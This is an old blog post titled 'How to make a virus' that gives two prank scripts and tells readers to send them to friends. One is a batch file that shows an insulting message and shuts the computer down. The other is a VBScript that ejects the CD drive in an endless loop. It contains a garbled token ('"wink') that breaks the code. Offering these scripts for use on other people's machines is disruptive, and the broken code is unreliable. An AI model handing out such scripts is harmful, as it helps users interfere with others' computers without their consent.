Tuesday 9 October 2012

How to make a virus||Make a virus in notpad

Everyone want a strong and esay virus or program code.
Today i give u some funny and amesgin tricks
This is some funny virus tricks


 1 This is used to shutdown his friend Computer.

 

@echo off

msg * I don't like you
shutdown -c "Error! You are too silly!" -s

Save this file with name "Anything.BAT" in All Files and send it.

2. This is a second trick to how pop up his friends cd-drive again and again

















Set oWMP = CreateObject("WMPlayer.OCX.7"wink
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save this file with name "Anything.VBS" and send it.

No comments:

Post a Comment

Plz....Post Your Comment....